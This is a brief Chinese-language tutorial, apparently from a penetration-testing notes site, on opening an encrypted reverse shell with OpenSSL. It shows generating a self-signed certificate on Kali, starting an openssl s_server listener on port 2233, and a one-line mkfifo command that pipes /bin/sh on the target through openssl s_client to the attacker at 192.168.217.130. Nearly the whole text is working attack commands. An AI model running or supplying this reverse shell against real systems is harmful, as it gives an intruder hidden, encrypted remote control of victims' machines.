在kali上生成自签名证书

    1. openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

    openssl反弹shell - 图1

    在kali上启动2233端口监听

    openssl s_server -quiet -key key.pem -cert cert.pem -port 2233

    在目标机器上利用openssl反弹shell

    mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.217.130:2233> /tmp/s; rm /tmp/s

    openssl反弹shell - 图2